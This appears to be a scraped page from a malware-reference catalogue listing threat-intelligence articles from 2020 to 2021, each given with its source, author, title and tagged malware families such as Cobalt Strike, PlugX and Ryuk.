Markus NeisCracking a Soft Cell is Harder Than You Think Ghost RAT
MimiKatz
PlugX
Poison Ivy
Trochilus RAT
×Select Content2021-01-15
⋅
The Hacker News
⋅
Ravie LakshmamanResearchers Disclose Undocumented Chinese Malware Used in Recent Attacks CROSSWALK
×Select Content2021-01-15
⋅
Medium Dansec
⋅
Dan LussierDetecting Malicious C2 Activity -SpawnAs & SMB Lateral Movement in CobaltStrike Cobalt Strike
×Select Content2021-01-14
⋅
PTSecurity
⋅
PT ESC Threat IntelligenceHigaisa or Winnti? APT41 backdoors, old and new Cobalt Strike
CROSSWALK
FunnySwitch
PlugX
ShadowPad
×Select Content2021-01-12
⋅
BrightTALK (FireEye)
⋅
Ben Read,
John HultquistUNC2452: What We Know So Far Cobalt Strike
SUNBURST
TEARDROP
×Select Content2021-01-12
⋅
Fox-IT
⋅
Wouter JansenAbusing cloud services to fly under the radar Cobalt Strike
×Select Content2021-01-11
⋅
SolarWinds
⋅
Sudhakar RamakrishnaNew Findings From Our Investigation of SUNBURST Cobalt Strike
SUNBURST
TEARDROP
×Select Content2021-01-11
⋅
The DFIR Report
⋅
The DFIR ReportTrickbot Still Alive and Well Cobalt Strike
TrickBot
×Select Content2021-01-10
⋅
Medium walmartglobaltech
⋅
Jason ReavesMAN1, Moskal, Hancitor and a side of Ransomware Cobalt Strike
Hancitor
SendSafe
VegaLocker
Moskalvzapoe
×Select Content2021-01-09
⋅
Marco Ramilli's Blog
⋅
Marco RamilliCommand and Control Traffic Patterns ostap
LaZagne
Agent Tesla
Azorult
Buer
Cobalt Strike
DanaBot
DarkComet
Dridex
Emotet
Formbook
IcedID
ISFB
NetWire RC
PlugX
Quasar RAT
SmokeLoader
TrickBot
×Select Content2021-01-09
⋅
Connor McGarr's Blog
⋅
Connor McGarrMalware Development: Leveraging Beacon Object Files for Remote Process Injection via Thread Hijacking Cobalt Strike
×Select Content2021-01-07
⋅
Recorded Future
⋅
Insikt Group®Aversary Infrastructure Report 2020: A Defender's View Octopus
pupy
Cobalt Strike
Empire Downloader
Meterpreter
PoshC2
×Select Content2021-01-06
⋅
Red Canary
⋅
Tony LambertHunting for GetSystem in offensive security tools Cobalt Strike
Empire Downloader
Meterpreter
PoshC2
×Select Content2021-01-05
⋅
Trend Micro
⋅
Trend Micro ResearchEarth Wendigo Injects JavaScript Backdoor to Service Worker for Mailbox Exfiltration Cobalt Strike
Earth Wendigo
×Select Content2021-01-04
⋅
Bleeping Computer
⋅
Ionut IlascuChina's APT hackers move to ransomware attacks Clambling
PlugX
×Select Content2021-01-04
⋅
Medium haggis-m
⋅
Michael HaagMalleable C2 Profiles and You Cobalt Strike
×Select Content2021-01-01
⋅
AWAKE
⋅
Awake SecurityBreaking the Ice: Detecting IcedID and Cobalt Strike Beacon with Network Detection and Response (NDR) Cobalt Strike
IcedID
PhotoLoader
×Select Content2021-01-01
⋅
DomainTools
⋅
Joe SlowikConceptualizing a Continuum of Cyber Threat Attribution CHINACHOPPER
SUNBURST
×Select Content2021-01-01
⋅
Secureworks
⋅
SecureWorksThreat Profile: GOLD WATERFALL Cobalt Strike
DarkSide
GOLD WATERFALL
×Select Content2021-01-01
⋅
Mandiant
⋅
MandiantM-TRENDS 2021 Cobalt Strike
SUNBURST
×Select Content2021-01-01
⋅
⋅
Github (WBGlIl)
⋅
WBGlIlA book on cobaltstrike Cobalt Strike
×Select Content2021-01-01
⋅
Symantec
⋅
Symantec Threat Hunter TeamSupply Chain Attacks:Cyber Criminals Target the Weakest Link Cobalt Strike
Raindrop
SUNBURST
TEARDROP
×Select Content2021-01-01
⋅
Secureworks
⋅
SecureWorksThreat Profile: GOLD WINTER Cobalt Strike
Hades
Meterpreter
GOLD WINTER
×Select Content2021-01-01
⋅
Talos
⋅
Talos Incident ResponseEvicting Maze Cobalt Strike
Maze
×Select Content2021-01-01
⋅
SecureWorksThreat Profile: GOLD DRAKE Cobalt Strike
Dridex
FriedEx
Koadic
MimiKatz
WastedLocker
Evil Corp
×Select Content2021-01-01
⋅
Talos
⋅
Talos Incident ResponseCobalt Strikes Out Cobalt Strike
×Select Content2020-12-26
⋅
Medium grimminck
⋅
Stefan GrimminckSpoofing JARM signatures. I am the Cobalt Strike server now! Cobalt Strike
×Select Content2020-12-26
⋅
CYBER GEEKS All Things Infosec
⋅
CyberMasterVAnalyzing APT19 malware using a step-by-step method Derusbi
×Select Content2020-12-24
⋅
IronNet
⋅
Adam HlavekChina cyber attacks: the current threat landscape PLEAD
TSCookie
FlowCloud
Lookback
PLEAD
PlugX
Quasar RAT
Winnti
×Select Content2020-12-22
⋅
TRUESEC
⋅
Mattias WåhlénCollaboration between FIN7 and the RYUK group, a Truesec Investigation Carbanak
Cobalt Strike
Ryuk
×Select Content2020-12-21
⋅
Fortinet
⋅
Udi YavoWhat We Have Learned So Far about the “Sunburst”/SolarWinds Hack Cobalt Strike
SUNBURST
TEARDROP
×Select Content2020-12-20
⋅
Randhome
⋅
Etienne MaynierAnalyzing Cobalt Strike for Fun and Profit Cobalt Strike
×Select Content2020-12-15
⋅
Github (sophos-cybersecurity)
⋅
Sophos Cyber Security Teamsolarwinds-threathunt Cobalt Strike
SUNBURST
×Select Content2020-12-15
⋅
PICUS Security
⋅
Süleyman ÖzarslanTactics, Techniques, and Procedures (TTPs) Used in the SolarWinds Breach Cobalt Strike
SUNBURST
×Select Content2020-12-14
⋅
Palo Alto Networks Unit 42
⋅
Unit 42Threat Brief: SolarStorm and SUNBURST Customer Coverage Cobalt Strike
SUNBURST
×Select Content2020-12-11
⋅
Blackberry
⋅
BlackBerry Research and Intelligence teamMountLocker Ransomware-as-a-Service Offers Double Extortion Capabilities to Affiliates Cobalt Strike
Mount Locker
×Select Content2020-12-10
⋅
ESET Research
⋅
Mathieu TartareOperation StealthyTrident: corporate software under attack HyperBro
PlugX
Tmanger
TA428
×Select Content2020-12-10
⋅
ESET Research
⋅
Mathieu TartareOperation StealthyTrident: corporate software under attack HyperBro
PlugX
ShadowPad
Tmanger
×Select Content2020-12-10
⋅
Palo Alto Networks Unit 42
⋅
Unit42Threat Brief: FireEye Red Team Tool Breach Cobalt Strike
×Select Content2020-12-10
⋅
Intel 471
⋅
Intel 471No pandas, just people: The current state of China’s cybercrime underground Anubis
SpyNote
AsyncRAT
Cobalt Strike
Ghost RAT
NjRAT
×Select Content2020-12-09
⋅
InfoSec Handlers Diary Blog
⋅
Brad DuncanRecent Qakbot (Qbot) activity Cobalt Strike
QakBot
×Select Content2020-12-09
⋅
Avast Decoded
⋅
Igor Morgenstern,
Luigino CamastraAPT Group Targeting Governmental Agencies in East Asia Albaniiutas
HyperBro
PlugX
PolPo
Tmanger
×Select Content2020-12-09
⋅
Cisco
⋅
Caitlin Huey,
David LiebenbergQuarterly Report: Incident Response trends from Fall 2020 Cobalt Strike
IcedID
Maze
RansomEXX
Ryuk
×Select Content2020-12-09
⋅
FireEye
⋅
Mitchell Clarke,
Tom HallIt's not FINished The Evolving Maturity in Ransomware Operations (SLIDES) Cobalt Strike
DoppelPaymer
QakBot
REvil
×Select Content2020-12-09
⋅
Avast Decoded
⋅
Igor Morgenstern,
Luigino CamastraAPT Group Targeting Governmental Agencies in East Asia Albaniiutas
HyperBro
PlugX
Tmanger
TA428
×Select Content2020-12-08
⋅
Cobalt Strike
⋅
Raphael MudgeA Red Teamer Plays with JARM Cobalt Strike
×Select Content2020-12-02
⋅
Red Canary
⋅
twitter (@redcanary)Tweet on increased #Qbot activity delivering Cobalt Strike & #Egregor ransomware Cobalt Strike
Egregor
QakBot
×Select Content2020-12-01
⋅
mez0.cc
⋅
mez0Cobalt Strike PowerShell Execution Cobalt Strike
×Select Content2020-12-01
⋅
360.cn
⋅
jindanlongHunting Beacons Cobalt Strike
×Select Content2020-11-30
⋅
FireEye
⋅
Mitchell Clarke,
Tom HallIt's not FINished The Evolving Maturity in Ransomware Operations Cobalt Strike
DoppelPaymer
MimiKatz
QakBot
REvil
×Select Content2020-11-30
⋅
Microsoft
⋅
Microsoft 365 Defender Threat Intelligence Team,
Microsoft Threat Intelligence Center (MSTIC)Threat actor (BISMUTH) leverages coin miner techniques to stay under the radar – here’s how to spot them Cobalt Strike
×Select Content2020-11-27
⋅
⋅
Macnica
⋅
Hiroshi TakeuchiAnalyzing Organizational Invasion Ransom Incidents Using Dtrack Cobalt Strike
Dtrack
×Select Content2020-11-27
⋅
PTSecurity
⋅
Alexey Vishnyakov,
Denis GoydenkoInvestigation with a twist: an accidental APT attack and averted data destruction TwoFace
CHINACHOPPER
HyperBro
MegaCortex
MimiKatz
×Select Content2020-11-26
⋅
Cybereason
⋅
Cybereason Nocturnus,
Lior RochbergerCybereason vs. Egregor Ransomware Cobalt Strike
Egregor
IcedID
ISFB
QakBot
×Select Content2020-11-25
⋅
SentinelOne
⋅
Jim WalterEgregor RaaS Continues the Chaos with Cobalt Strike and Rclone Cobalt Strike
Egregor
×Select Content2020-11-23
⋅
Proofpoint
⋅
Proofpoint Threat Research TeamTA416 Goes to Ground and Returns with a Golang PlugX Malware Loader PlugX
MUSTANG PANDA
×Select Content2020-11-23
⋅
Youtube (OWASP DevSlop)
⋅
Negar Shabab,
Noushin ShababCompromised Compilers - A new perspective of supply chain cyber attacks ShadowPad
×Select Content2020-11-20
⋅
ZDNet
⋅
Catalin CimpanuThe malware that usually installs ransomware and you need to remove right away Avaddon
BazarBackdoor
Buer
Clop
Cobalt Strike
Conti
DoppelPaymer
Dridex
Egregor
Emotet
FriedEx
MegaCortex
Phorpiex
PwndLocker
QakBot
Ryuk
SDBbot
TrickBot
Zloader
×Select Content2020-11-20
⋅
F-Secure Labs
⋅
Riccardo AncaraniDetecting Cobalt Strike Default Modules via Named Pipe Analysis Cobalt Strike
×Select Content2020-11-20
⋅
Trend Micro
⋅
Abraham Camba,
Bren Matthew Ebriega,
Gilbert SisonWeaponizing Open Source Software for Targeted Attacks LaZagne
Defray
PlugX
×Select Content2020-11-20
⋅
⋅
360 netlab
⋅
JiaYuBlackrota, a highly obfuscated backdoor developed by Go Cobalt Strike
×Select Content2020-11-17
⋅
Salesforce Engineering
⋅
John AlthouseEasily Identify Malicious Servers on the Internet with JARM Cobalt Strike
TrickBot
×Select Content2020-11-17
⋅
cyble
⋅
CybleOceanLotus Continues With Its Cyber Espionage Operations Cobalt Strike
Meterpreter
×Select Content2020-11-15
⋅
Trustnet
⋅
Michael WainshtainFrom virus alert to PowerShell Encrypted Loader Cobalt Strike
×Select Content2020-11-13
⋅
Youtube (The Standoff)
⋅
Alexey Zakharov,
Positive TechnologiesFF_202_Eng - From old Higaisa samples to new Winnti backdoors: The story of one research CROSSWALK
Unidentified 076 (Higaisa LNK to Shellcode)
×Select Content2020-11-09
⋅
Bleeping Computer
⋅
Ionut IlascuFake Microsoft Teams updates lead to Cobalt Strike deployment Cobalt Strike
DoppelPaymer
NjRAT
Predator The Thief
Zloader
×Select Content2020-11-06
⋅
Cobalt Strike
⋅
Raphael MudgeCobalt Strike 4.2 – Everything but the kitchen sink Cobalt Strike
×Select Content2020-11-06
⋅
Palo Alto Networks Unit 42
⋅
CRYPSIS,
Drew Schmitt,
Ryan TraceyIndicators of Compromise related to Cobaltstrike, PyXie Lite, Vatet and Defray777 Cobalt Strike
PyXie
RansomEXX
×Select Content2020-11-06
⋅
Advanced Intelligence
⋅
Vitali KremezAnatomy of Attack: Inside BazarBackdoor to Ryuk Ransomware "one" Group via Cobalt Strike BazarBackdoor
Cobalt Strike
Ryuk
×Select Content2020-11-06
⋅
Volexity
⋅
Steven Adair,
Thomas Lancaster,
Volexity Threat ResearchOceanLotus: Extending Cyber Espionage Operations Through Fake Websites Cobalt Strike
KerrDown
APT32
×Select Content2020-11-05
⋅
Twitter (@ffforward)
⋅
TheAnalystTweet on Zloader infection leads to Cobaltstrike Installation and deployment of RYUK Cobalt Strike
Ryuk
Zloader
×Select Content2020-11-05
⋅
The DFIR Report
⋅
The DFIR ReportRyuk Speed Run, 2 Hours to Ransom BazarBackdoor
Cobalt Strike
Ryuk
×Select Content2020-11-04
⋅
Sophos
⋅
Gabor SzappanosA new APT uses DLL side-loads to “KilllSomeOne” KilllSomeOne
PlugX
×Select Content2020-11-04
⋅
VMRay
⋅
Giovanni VignaTrick or Threat: Ryuk ransomware targets the health care industry BazarBackdoor
Cobalt Strike
Ryuk
TrickBot
×Select Content2020-11-03
⋅
InfoSec Handlers Diary Blog
⋅
Renato MarinhoAttackers Exploiting WebLogic Servers via CVE-2020-14882 to install Cobalt Strike Cobalt Strike
×Select Content2020-11-03
⋅
Kaspersky Labs
⋅
GReATAPT trends report Q3 2020 WellMail
EVILNUM
Janicab
Poet RAT
AsyncRAT
Ave Maria
Cobalt Strike
Crimson RAT
CROSSWALK
Dtrack
LODEINFO
MoriAgent
Okrum
PlugX
poisonplug
Rover
ShadowPad
SoreFang
Winnti
×Select Content2020-10-30
⋅
Github (ThreatConnect-Inc)
⋅
ThreatConnectUNC 1878 Indicators from Threatconnect BazarBackdoor
Cobalt Strike
Ryuk
×Select Content2020-10-29
⋅
RiskIQ
⋅
RiskIQRyuk Ransomware: Extensive Attack Infrastructure Revealed Cobalt Strike
Ryuk
×Select Content2020-10-29
⋅
Red Canary
⋅
The Red Canary TeamA Bazar start: How one hospital thwarted a Ryuk ransomware outbreak Cobalt Strike
Ryuk
TrickBot
×Select Content2020-10-29
⋅
Github (Swisscom)
⋅
Swisscom CSIRTList of CobaltStrike C2's used by RYUK Cobalt Strike
×Select Content2020-10-28
⋅
FireEye
⋅
Douglas Bienstock,
Jeremy Kennelly,
Joshua Shilko,
Kimberly Goody,
Steve ElovitzUnhappy Hour Special: KEGTAP and SINGLEMALT With a Ransomware Chaser BazarBackdoor
Cobalt Strike
Ryuk
UNC1878
×Select Content2020-10-27
⋅
Sophos Managed Threat Response (MTR)
⋅
Greg IddonMTR Casebook: An active adversary caught in the act Cobalt Strike
×Select Content2020-10-27
⋅
Dr.Web
⋅
Dr.WebStudy of the ShadowPad APT backdoor and its relation to PlugX Ghost RAT
PlugX
ShadowPad
×Select Content2020-10-18
⋅
The DFIR Report
⋅
The DFIR ReportRyuk in 5 Hours BazarBackdoor
Cobalt Strike
Ryuk
×Select Content2020-10-14
⋅
RiskIQ
⋅
Jon Gross,
Steve GintyA Well-Marked Trail: Journeying through OceanLotus's Infrastructure Cobalt Strike
×Select Content2020-10-14
⋅
Sophos
⋅
Sean GallagherThey’re back: inside a new Ryuk ransomware attack Cobalt Strike
Ryuk
SystemBC
×Select Content2020-10-12
⋅
Malwarebytes Labs
⋅
Hossein Jazi,
Jérôme Segura,
Malwarebytes Threat Intelligence Team,
Roberto SantosWinnti APT group docks in Sri Lanka for new campaign DBoxAgent
SerialVlogger
Winnti
×Select Content2020-10-12
⋅
Advanced Intelligence
⋅
Roman Marshanski,
Vitali Kremez"Front Door" into BazarBackdoor: Stealthy Cybercrime Weapon BazarBackdoor
Cobalt Strike
Ryuk
×Select Content2020-10-11
⋅
Github (StrangerealIntel)
⋅
StrangerealIntelChimera, APT19 under the radar ? Cobalt Strike
Meterpreter
×Select Content2020-10-08
⋅
Bayerischer Rundfunk
⋅
Ann-Kathrin Wetter,
Hakan Tanriverdi,
Kai Biermann,
Max Zierer,
Thi Do NguyenThere is no safe place Cobalt Strike
×Select Content2020-10-08
⋅
The DFIR Report
⋅
The DFIR ReportRyuk’s Return BazarBackdoor
Cobalt Strike
Ryuk
×Select Content2020-10-02
⋅
Health Sector Cybersecurity Coordination Center (HC3)
⋅
Health Sector Cybersecurity Coordination Center (HC3)Report 202010021600: Recent Bazarloader Use in Ransomware Campaigns BazarBackdoor
Cobalt Strike
Ryuk
TrickBot
×Select Content2020-10-01
⋅
Wired
⋅
Andy GreenbergRussia’s Fancy Bear Hackers Likely Penetrated a US Federal Agency Cobalt Strike
Meterpreter
×Select Content2020-10-01
⋅
US-CERT
⋅
US-CERTAlert (AA20-275A): Potential for China Cyber Response to Heightened U.S.-China Tensions CHINACHOPPER
Cobalt Strike
Empire Downloader
MimiKatz
Poison Ivy
×Select Content2020-09-29
⋅
Github (Apr4h)
⋅
ApraCobaltStrikeScan Cobalt Strike
×Select Content2020-09-29
⋅
CrowdStrike
⋅
Kareem Hamdan,
Lucas MillerGetting the Bacon from the Beacon Cobalt Strike
×Select Content2020-09-24
⋅
US-CERT
⋅
US-CERTAnalysis Report (AR20-268A): Federal Agency Compromised by Malicious Cyber Actor Cobalt Strike
Meterpreter
×Select Content2020-09-21
⋅
Cisco Talos
⋅
Joe Marshall,
JON MUNSHAW,
Nick MavisThe art and science of detecting Cobalt Strike Cobalt Strike
×Select Content2020-09-18
⋅
Symantec
⋅
Threat Hunter TeamAPT41: Indictments Put Chinese Espionage Group in the Spotlight CROSSWALK
PlugX
poisonplug
ShadowPad
Winnti
×Select Content2020-09-18
⋅
Trend Micro
⋅
Trend MicroU.S. Justice Department Charges APT41 Hackers over Global Cyberattacks Cobalt Strike
ColdLock
×Select Content2020-09-16
⋅
FBI
⋅
FBIFBI Flash AC-000133-TT: Indictment of China-Based Cyber Actors Associated with APT 41for Intrusion Activities APT41
×Select Content2020-09-16
⋅
Department of Justice
⋅
Department of JusticeSeven International Cyber Defendants, Including “Apt41” Actors, Charged In Connection With Computer Intrusion Campaigns Against More Than 100 Victims Globally APT41
RedGolf
×Select Content2020-09-15
⋅
US-CERT
⋅
US-CERTAlert (AA20-259A): Iran-Based Threat Actor Exploits VPN Vulnerabilities CHINACHOPPER
Fox Kitten
×Select Content2020-09-15
⋅
Recorded Future
⋅
Insikt Group®Back Despite Disruption: RedDelta Resumes Operations PlugX
×Select Content2020-09-15
⋅
US-CERT
⋅
US-CERTMalware Analysis Report (AR20-259A): Iranian Web Shells CHINACHOPPER
×Select Content2020-09-11
⋅
ThreatConnect
⋅
ThreatConnect Research TeamResearch Roundup: Activity on Previously Identified APT33 Domains Emotet
PlugX
APT33
×Select Content2020-09-10
⋅
Kaspersky Labs
⋅
GReATAn overview of targeted attacks and APTs on Linux Cloud Snooper
Dacls
DoubleFantasy
MESSAGETAP
Penquin Turla
Tsunami
elf.wellmess
X-Agent
×Select Content2020-09-08
⋅
PTSecurity
⋅
PTSecurityShadowPad: new activity from the Winnti group CCleaner Backdoor
Korlia
ShadowPad
TypeHash
×Select Content2020-09-03
⋅
⋅
Viettel Cybersecurity
⋅
vuonglvmAPT32 deobfuscation arsenal: Deobfuscating một vài loại Obfucation Toolkit của APT32 (Phần 2) Cobalt Strike
×Select Content2020-09-01
⋅
Cisco Talos
⋅
Caitlin Huey,
David LiebenbergQuarterly Report: Incident Response trends in Summer 2020 Cobalt Strike
LockBit
Mailto
Maze
Ryuk
×Select Content2020-08-31
⋅
The DFIR Report
⋅
The DFIR ReportNetWalker Ransomware in 1 Hour Cobalt Strike
Mailto
MimiKatz
×Select Content2020-08-20
⋅
⋅
Seebug Paper
⋅
MalaykeUse ZoomEye to track multiple Redteam C&C post-penetration attack frameworks Cobalt Strike
Empire Downloader
PoshC2
×Select Content2020-08-19
⋅
⋅
TEAMT5
⋅
TeamT5調查局 08/19 公布中國對台灣政府機關駭侵事件說明 Cobalt Strike
Waterbear
×Select Content2020-08-14
⋅
Twitter (@VK_intel)
⋅
Vitali KremezTweet on Zloader infection leading to Cobaltstrike Installation Cobalt Strike
Zloader
×Select Content2020-08-06
⋅
Wired
⋅
Andy GreenbergChinese Hackers Have Pillaged Taiwan's Semiconductor Industry Cobalt Strike
MimiKatz
Winnti
Red Charon
×Select Content2020-08-04
⋅
BlackHat
⋅
Chung-Kuan Chen,
Inndy Lin,
Shang-De JiangOperation Chimera - APT Operation Targets Semiconductor Vendors Cobalt Strike
MimiKatz
Winnti
Red Charon
×Select Content2020-07-29
⋅
Recorded Future
⋅
Insikt GroupChinese State-sponsored Group RedDelta Targets the Vatican and Catholic Organizations PlugX
×Select Content2020-07-29
⋅
ESET Research
⋅
welivesecurityTHREAT REPORT Q2 2020 DEFENSOR ID
HiddenAd
Bundlore
Pirrit
Agent.BTZ
Cerber
ClipBanker
CROSSWALK
Cryptowall
CTB Locker
DanaBot
Dharma
Formbook
Gandcrab
Grandoreiro
Houdini
ISFB
LockBit
Locky
Mailto
Maze
Microcin
Nemty
NjRAT
Phobos
PlugX
Pony
REvil
Socelars
STOP
Tinba
TrickBot
WannaCryptor
×Select Content2020-07-29
⋅
Kaspersky Labs
⋅
GReATAPT trends report Q2 2020 PhantomLance
Dacls
Penquin Turla
elf.wellmess
AppleJeus
Dacls
AcidBox
Cobalt Strike
Dacls
EternalPetya
Godlike12
Olympic Destroyer
PlugX
shadowhammer
ShadowPad
Sinowal
VHD Ransomware
Volgmer
WellMess
X-Agent
XTunnel
×Select Content2020-07-28
⋅
⋅
NTT
⋅
NTT SecurityCraftyPanda 標的型攻撃解析レポート Ghost RAT
PlugX
×Select Content2020-07-26
⋅
Shells.System blog
⋅
AskarIn-Memory shellcode decoding to evade AVs/EDRs Cobalt Strike
×Select Content2020-07-22
⋅
On the Hunt
⋅
Newton PaulAnalysing Fileless Malware: Cobalt Strike Beacon Cobalt Strike
×Select Content2020-07-21
⋅
YouTube ( OPCDE with Matt Suiche)
⋅
Mohamad MokbelvOPCDE #9 - A Journey into Malware HTTP Communication Channels Spectacles (Mohamad Mokbel) Alureon
Aytoke
Cobra Carbon System
CROSSWALK
danbot
ProtonBot
Silence
×Select Content2020-07-21
⋅
Department of Justice
⋅
Department of JusticeTwo Chinese Hackers Working with the Ministry of State Security Charged with Global Computer Intrusion Campaign Targeting Intellectual Property and Confidential Business Information, Including COVID-19 Research CHINACHOPPER
BRONZE SPRING
×Select Content2020-07-21
⋅
Malwarebytes
⋅
Hossein Jazi,
Jérôme SeguraChinese APT group targets India and Hong Kong using new variant of MgBot malware KSREMOTE
Cobalt Strike
MgBot
Evasive Panda
×Select Content2020-07-20
⋅
Dr.Web
⋅
Dr.WebStudy of the APT attacks on state institutions in Kazakhstan and Kyrgyzstan Microcin
Mirage
PlugX
WhiteBird
×Select Content2020-07-20
⋅
Risky.biz
⋅
Daniel GordonWhat even is Winnti? CCleaner Backdoor
Ghost RAT
PlugX
ZXShell
×Select Content2020-07-20
⋅
or10nlabs
⋅
oR10nReverse Engineering the New Mustang Panda PlugX Downloader PlugX
×Select Content2020-07-15
⋅
ZDNet
⋅
Catalin CimpanuChinese state hackers target Hong Kong Catholic Church PlugX
×Select Content2020-07-14
⋅
CrowdStrike
⋅
Falcon OverWatch TeamManufacturing Industry in the Adversaries’ Crosshairs ShadowPad
Snake
×Select Content2020-07-07
⋅
MWLab
⋅
Ladislav BačoCobalt Strike stagers used by FIN6 Cobalt Strike
×Select Content2020-07-05
⋅
Council on Foreign Relations
⋅
Cyber Operations TrackerAPT 41 APT41
×Select Content2020-07-05
⋅
or10nlabs
⋅
oR10nReverse Engineering the Mustang Panda PlugX RAT – Extracting the Config PlugX
×Select Content2020-07-05
⋅
Council on Foreign Relations
⋅
Cyber Operations TrackerWinnti Umbrella APT41
×Select Content2020-07-01
⋅
Contextis
⋅
Lampros Noutsos,
Oliver FayDLL Search Order Hijacking Cobalt Strike
PlugX
×Select Content2020-06-25
⋅
Dr.Web
⋅
Dr.WebBackDoor.ShadowPad.1 ShadowPad
×Select Content2020-06-23
⋅
NCC Group
⋅
Michael Sandee,
Nikolaos Pantazopoulos,
Stefano AntenucciWastedLocker: A New Ransomware Variant Developed By The Evil Corp Group Cobalt Strike
ISFB
WastedLocker
×Select Content2020-06-23
⋅
Symantec
⋅
Critical Attack Discovery and Intelligence TeamSodinokibi: Ransomware Attackers also Scanning for PoS Software, Leveraging Cobalt Strike Cobalt Strike
REvil
×Select Content2020-06-22
⋅
Talos Intelligence
⋅
Asheer MalhotraIndigoDrop spreads via military-themed lures to deliver Cobalt Strike Cobalt Strike
IndigoDrop
×Select Content2020-06-22
⋅
Sentinel LABS
⋅
Jason Reaves,
Joshua PlattInside a TrickBot Cobalt Strike Attack Server Cobalt Strike
TrickBot
×Select Content2020-06-19
⋅
Zscaler
⋅
Atinderpal Singh,
Nirmal Singh,
Sahil AntilTargeted Attack Leverages India-China Border Dispute to Lure Victims Cobalt Strike
×Select Content2020-06-19
⋅
Youtube (Raphael Mudge)
⋅
Raphael MudgeBeacon Object Files - Luser Demo Cobalt Strike
×Select Content2020-06-18
⋅
Australian Cyber Security Centre
⋅
Australian Cyber Security Centre (ACSC)Advisory 2020-008: Copy-Paste Compromises –tactics, techniques and procedures used to target multiple Australian networks TwoFace
Cobalt Strike
Empire Downloader
×Select Content2020-06-17
⋅
Malwarebytes
⋅
Hossein Jazi,
Jérôme SeguraMulti-stage APT attack drops Cobalt Strike using Malleable C2 feature Cobalt Strike
×Select Content2020-06-16
⋅
Intezer
⋅
Aviygayil MechtingerELF Malware Analysis 101: Linux Threats No Longer an Afterthought Cloud Snooper
Dacls
EvilGnome
HiddenWasp
MESSAGETAP
NOTROBIN
QNAPCrypt
Winnti
×Select Content2020-06-15
⋅
NCC Group
⋅
Exploit Development GroupStriking Back at Retired Cobalt Strike: A look at a legacy vulnerability Cobalt Strike
×Select Content2020-06-09
⋅
Github (Sentinel-One)
⋅
Gal KristalCobaltStrikeParser Cobalt Strike
×Select Content2020-06-03
⋅
Kaspersky Labs
⋅
Giampaolo Dedola,
GReAT,
Mark LechtikCycldek: Bridging the (air) gap 8.t Dropper
NewCore RAT
PlugX
USBCulprit
GOBLIN PANDA
Hellsing
×Select Content2020-06-02
⋅
Lab52
⋅
Jagaimo KawaiiMustang Panda Recent Activity: Dll-Sideloading trojans with temporal C2 servers PlugX
×Select Content2020-05-24
⋅
or10nlabs
⋅
oR10nReverse Engineering the Mustang Panda PlugX Loader PlugX
×Select Content2020-05-21
⋅
ESET Research
⋅
Martin Smolár,
Mathieu TartareNo “Game over” for the Winnti Group ACEHASH
HTran
MimiKatz
PipeMon
×Select Content2020-05-15
⋅
Twitter (@stvemillertime)
⋅
Steve MillerTweet on SOGU development timeline, including TIGERPLUG IOCs PlugX
×Select Content2020-05-14
⋅
Lab52
⋅
DexThe energy reserves in the Eastern Mediterranean Sea and a malicious campaign of APT10 against Turkey Cobalt Strike
HTran
MimiKatz
PlugX
Quasar RAT
×Select Content2020-05-11
⋅
SentinelOne
⋅
Gal KristalThe Anatomy of an APT Attack and CobaltStrike Beacon’s Encoded Configuration Cobalt Strike
×Select Content2020-05-01
⋅
⋅
Viettel Cybersecurity
⋅
CyberthreatChiến dịch của nhóm APT Trung Quốc Goblin Panda tấn công vào Việt Nam lợi dụng đại dịch Covid-19 (phần 1) NewCore RAT
PlugX
×Select Content2020-04-24
⋅
The DFIR Report
⋅
The DFIR ReportUrsnif via LOLbins Cobalt Strike
LOLSnif
TeamSpy
×Select Content2020-04-16
⋅
Medium CyCraft
⋅
CyCraft Technology CorpTaiwan High-Tech Ecosystem Targeted by Foreign APT Group: Digital Skeleton Key Bypasses Security Measures Cobalt Strike
MimiKatz
Red Charon
×Select Content2020-04-13
⋅
Palo Alto Networks Unit 42
⋅
Bryan Lee,
Jen Miller-Osborn,
Robert FalconeAPT41 Using New Speculoos Backdoor to Target Organizations Globally Speculoos
APT41
×Select Content2020-04-07
⋅
Blackberry
⋅
Blackberry ResearchDecade of the RATS: Cross-Platform APT Espionage Attacks Targeting Linux, Windows and Android Penquin Turla
XOR DDoS
ZXShell
×Select Content2020-04-02
⋅
Darktrace
⋅
Max HeinemeyerCatching APT41 exploiting a zero-day vulnerability Cobalt Strike
×Select Content2020-03-26
⋅
VMWare Carbon Black
⋅
Scott KnightThe Dukes of Moscow Cobalt Strike
LiteDuke
MiniDuke
OnionDuke
PolyglotDuke
PowerDuke
×Select Content2020-03-25
⋅
FireEye
⋅
Christopher Glyer,
Dan Perez,
Sarah Jones,
Steve MillerThis Is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits Speculoos
Cobalt Strike
×Select Content2020-03-25
⋅
Wilbur Security
⋅
JWTrickbot to Ryuk in Two Hours Cobalt Strike
Ryuk
TrickBot
×Select Content2020-03-22
⋅
Malware and Stuff
⋅
Andreas KlopschMustang Panda joins the COVID-19 bandwagon Cobalt Strike
×Select Content2020-03-22
⋅
Anomali
⋅
Anomali Threat ResearchCOVID-19 Themes Are Being Utilized by Threat Actors of Varying Sophistication PlugX
×Select Content2020-03-20
⋅
RECON INFOSEC
⋅
Luke RustenAnalysis Of Exploitation: CVE-2020-10189 ( exploited by APT41) Cobalt Strike
×Select Content2020-03-19
⋅
⋅
VinCSS
⋅
m4n0w4rAnalysis of malware taking advantage of the Covid-19 epidemic to spread fake "Directive of Prime Minister Nguyen Xuan Phuc" - Part 2 PlugX
×Select Content2020-03-10
⋅
⋅
VinCSS
⋅
m4n0w4r[RE012] Analysis of malware taking advantage of the Covid-19 epidemic to spread fake "Directive of Prime Minister Nguyen Xuan Phuc" - Part 1 PlugX
×Select Content2020-03-04
⋅
Cobalt Strike
⋅
Raphael MudgeCobalt Strike joins Core Impact at HelpSystems, LLC Cobalt Strike
×Select Content2020-03-04
⋅
CrowdStrike
⋅
CrowdStrike2020 CrowdStrike Global Threat Report MESSAGETAP
More_eggs
8.t Dropper
Anchor
BabyShark
BadNews
Clop
Cobalt Strike
CobInt
Cobra Carbon System
Cutwail
DanaBot
Dharma
DoppelDridex
DoppelPaymer
Dridex
Emotet
FlawedAmmyy
FriedEx
Gandcrab
Get2
IcedID
ISFB
KerrDown
LightNeuron
LockerGoga
Maze
MECHANICAL
Necurs
Nokki
Outlook Backdoor
Phobos
Predator The Thief
QakBot
REvil
RobinHood
Ryuk
SDBbot
Skipper
SmokeLoader
TerraRecon
TerraStealer
TerraTV
TinyLoader
TrickBot
Vidar
Winnti
ANTHROPOID SPIDER
APT23
APT31
APT39
